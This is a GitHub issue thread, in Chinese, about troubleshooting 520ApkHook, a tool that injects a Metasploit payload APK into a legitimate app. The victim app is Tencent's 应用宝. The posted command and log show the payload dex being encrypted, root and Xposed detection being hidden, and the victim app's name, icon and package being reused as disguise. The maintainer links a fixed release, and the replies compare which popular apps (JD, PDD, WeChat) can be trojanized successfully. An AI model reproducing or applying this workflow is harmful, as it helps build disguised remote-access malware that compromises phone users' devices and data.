### ISSUE TITLE
生成好的文件在那个目录还是需要自己打包成apk文件

### ISSUE THREAD

**Issue by xiaoma99272** [cleverbao/520apkhook#16]
BaoGuo仍给你一个Apk，请安装它！  
ava -jar a520ApkHook-1.1-jar-with-dependencies.jar yyb.apk msf.apk

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
06/06 14:39:11.763 I/Config: 创建工作目录, /root/workDir
06/06 14:39:11.772 I/Config: 初始化配置信息完成. 
06/06 14:39:11.772 I/Main: 启动程序.

    ______ ___   ____   ___            __    __  __               __  
   / ____/|__ \ / __ \ /   |   ____   / /__ / / / /____   ____   / /__
  /___ \  __/ // / / // /| |  / __ \ / //_// /_/ // __ \ / __ \ / //_/
 ____/ / / __// /_/ // ___ | / /_/ // ,<  / __  // /_/ // /_/ // ,<   
/_____/ /____/\____//_/  |_|/ .___//_/|_|/_/ /_/ \____/ \____//_/|_|  
                           /_/                                        

06/06 14:39:11.772 I/Main: 初始化工作环境.
06/06 14:39:11.773 I/Config: 从Jar包中释放工具文件.
06/06 14:39:11.887 I/Config: 已释放 apktool.jar .
06/06 14:39:11.894 I/Config: 已释放 apksigner.jar .
06/06 14:39:11.894 I/Config: 已释放 Android.keystore .
06/06 14:39:11.920 I/Config: 已释放 520ApkBox64.apk .
06/06 14:39:11.942 I/Config: 已释放 520ApkBox32.apk .
06/06 14:39:11.942 I/Main: 释放所有脚本成功.
06/06 14:39:11.943 I/Main: 被注入的 Apk 文件为: yyb.apk
06/06 14:39:11.943 I/Main: 进行注入的 Payload Apk 文件为: msf.apk
06/06 14:39:11.943 I/Main: 尝试读取被注入Apk的信息. yyb.apk
06/06 14:39:12.017 I/GetSourceApkInfo: 获取注入 Apk 的MetaDate信息: {AppTargetSdkVersion=26, AppMaxSdkVersion=null, AppVersionCode=8432130, AppVersionName=8.4.3, AppMinSdkVersion=21, AppName=应用宝, AppPackageName=com.tencent.android.qqdownloader}
06/06 14:39:12.018 I/GetSourceApkInfo: 获取注入 Apk 的所有图标信息: [Icon{path='res/b/ic_launcher.png', density=0, size=2071}, Icon{path='res/k/ic_launcher.png', density=320, size=2071}]
06/06 14:39:12.021 I/GetSourceApkInfo: 获取注入 Apk 的最大的图标信息: Icon{path='res/k/ic_launcher.png', density=320, size=2071}
06/06 14:39:12.023 I/GetSourceApkInfo: 读取注入 Apk 最大的图标并保存, 保存位置: /root/workDir/hackApkIcon.png
06/06 14:39:12.144 I/GetSourceApkInfo: 在注入 Apk 中找到文件: lib/arm64-v8a/libBugly_Native.so
06/06 14:39:12.144 I/GetSourceApkInfo: 获取注入 Apk 的Arch信息: arm64-v8a
06/06 14:39:12.144 I/Main: 读取被注入Apk信息已完成. 
06/06 14:39:12.145 I/Main: 尝试读取 Payload Apk的信息. msf.apk
06/06 14:39:12.146 I/GetPayloadApkInfo: 使用apktool反编译 Payload Apk, msf.apk
I: Using Apktool 2.7.0 on msf.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Copying raw classes.dex file...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
06/06 14:39:13.751 I/GetPayloadApkInfo: 解析 Payload Apk 的AndroidManifest.xml文件, 并创建新的 AndroidManifest-New.xml文件. 
06/06 14:39:13.765 I/GetPayloadApkInfo: 为目标receiver添加android:exported=true属性.
06/06 14:39:13.781 I/GetPayloadApkInfo: 成功获取到 Payload Apk 的MainActivityName. 
06/06 14:39:13.783 I/GetPayloadApkInfo: 获取 payload Apk 文件中的Provider、Receiver、Service、Meta-data、Activity成功.
06/06 14:39:13.783 I/GetPayloadApkInfo: 尝试对 Payload Apk的dex文件进行加密压缩. msf.apk
06/06 14:39:13.783 I/GetPayloadApkInfo: dex文件加密密码为: d8Fx23JB
06/06 14:39:13.793 I/Main: 开始进行对被注入Apk进行包装.
06/06 14:39:13.793 I/HackApk: 目标Apk支持64位, 使用apktool反编译模板Apk, /root/workDir/libs/520ApkBox64.apk
I: Using Apktool 2.7.0 on 520ApkBox64.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
I: Copying META-INF/services directory
06/06 14:39:17.937 I/Main: 反编译模板Apk成功.
06/06 14:39:17.937 I/HackApk: 解析并修改模板Apk的AndroidManifest.xml文件. 
06/06 14:39:17.945 I/HackApk: 设置模板Appassets目录存储的被注入Apk名字. 1ce63c7f-55cb-4931-b8bc-7af39697f918
06/06 14:39:17.945 I/HackApk: 设置包装器的启动包名. com.tencent.android.qqdownloader
06/06 14:39:17.945 I/HackApk: 设置包装器开启守护进程. false
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Root. true
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Xposed. true
06/06 14:39:17.946 I/HackApk: 设置压缩后的dex文件名字. b17de3a2-9419-46a6-ae7c-4e98d2ccd2c6
06/06 14:39:17.946 I/HackApk: 设置dex文件的压缩包密码. d8Fx23JB
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的ApplicationName. android.app.Application
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的MainActivityName. com.metasploit.stage.MainActivity
06/06 14:39:17.946 I/HackApk: 将payload apk中的AndroidManifest-new.xml追加到apkbox的AndroidManifest.xml中.
06/06 14:39:17.950 I/HackApk: 写入模板App的AndroidManifest.xml文件成功.
06/06 14:39:17.951 I/HackApk: 解析并修改模板App的string.xml文件. 
06/06 14:39:17.954 I/HackApk: 设置模板App显示的名字. 应用宝
06/06 14:39:17.955 I/HackApk: 写入模板App的string.xml文件成功.
06/06 14:39:17.956 I/HackApk: 修复模板App的values-v31/colors.xml文件. 
06/06 14:39:17.957 I/HackApk: 修复模板App的values-v31/colors.xml文件成功. 
06/06 14:39:17.957 I/HackApk: 解析并修改模板App的apktool.yml文件. 
06/06 14:39:17.958 I/HackApk: 修改模板App的minSdkVersion、targetSdkVersion、versionName、versionCode信息. 
06/06 14:39:17.958 I/HackApk: 修改模板App的apktool.yml文件成功. 
06/06 14:39:17.958 I/HackApk: 原始smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/android/a520apkbox
06/06 14:39:17.958 I/HackApk: 修改后smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.959 I/HackApk: 创建新的smali目录: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.968 I/HackApk: 复制原始smali文件到新的smali目录中.
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$style.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$1.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.973 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$mipmap.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.974 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ProxyUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$2.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$layout.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$color.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$xml.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ClassLoaderUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.978 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$string.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/BuildConfig.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainActivity.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.992 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.995 I/HackApk: 已修改AndroidManifest.xml文件. 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox 
06/06 14:39:17.999 I/HackApk: 开始复制资源文件到模板App中.
06/06 14:39:17.999 I/HackApk: 已将Payload Apk 的Dex压缩包复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已将被注入Apk复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
java.lang.NullPointerException
        at java.base/java.io.File.<init>(File.java:278)
        at org.a520apkhook.HackApk.copyAssesResFile(HackApk.java:248)
        at org.a520apkhook.App.startHackApk(App.java:125)
        at org.a520apkhook.App.run(App.java:76)
        at picocli.CommandLine.executeUserObject(CommandLine.java:2026)
        at picocli.CommandLine.access$1500(CommandLine.java:148)
        at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2461)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2453)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2415)
        at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:2273)
        at picocli.CommandLine$RunLast.execute(CommandLine.java:2417)
        at picocli.CommandLine.execute(CommandLine.java:2170)
        at org.a520apkhook.App.main(App.java:44)

**Comment by ba0gu0** [comment]
下载最新版的。bug已修复。

[https://github.com/ba0gu0/520apkhook/releases/download/v1.1/a520ApkHook-1.1-jar-with-dependencies.jar](https://github.com/ba0gu0/520apkhook/releases/download/v1.1/a520ApkHook-1.1-jar-with-dependencies.jar)

**Comment by xiaoma99272** [comment]
java -jar a520ApkHook-1.1-jar-with-dependencies.jar yyb.apk msf.apk
是用的最新版
06/06 15:12:07.223 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
java.lang.NullPointerException
        at java.base/java.io.File.<init>(File.java:278)
        at org.a520apkhook.HackApk.copyAssesResFile(HackApk.java:261)
        at org.a520apkhook.App.startHackApk(App.java:139)
        at org.a520apkhook.App.run(App.java:90)
        at picocli.CommandLine.executeUserObject(CommandLine.java:2026)
        at picocli.CommandLine.access$1500(CommandLine.java:148)
        at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2461)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2453)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2415)
        at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:2273)
        at picocli.CommandLine$RunLast.execute(CommandLine.java:2417)
        at picocli.CommandLine.execute(CommandLine.java:2170)
        at org.a520apkhook.App.main(App.java:50)

**Comment by xiaoma99272** [comment]
> 下载最新版的。错误已修复。
> 
> https://github.com/ba0gu0/520apkhook/releases/download/v1.1/a520ApkHook-1.1-jar-with-dependencies.jar

kali中使用的 java -jar a520ApkHook-1.1-jar-with-dependencies.jar yyb.apk msf.apk  命令没有问题吧

**Comment by xiaoma99272** [comment]
> 下载最新版的。错误已修复。
> 
> https://github.com/ba0gu0/520apkhook/releases/download/v1.1/a520ApkHook-1.1-jar-with-dependencies.jar

非常感谢 成功了  对要注入的apk有要求应是  jd.apk 可以 PDD不行

**Comment by ba0gu0** [comment]
> > 下载最新版的。错误已修复。
> 
> > 
> 
> > https://github.com/ba0gu0/520apkhook/releases/download/v1.1/a520ApkHook-1.1-jar-with-dependencies.jar
> 
> 
> 
> 非常感谢 成功了  对要注入的apk有要求应是  jd.apk 可以 PDD不行



目前微信，es文件管理器在安卓12有问题，11可以正常用。pdd可能也有问题。
毕竟运行在虚拟机里面，用的第三方的。
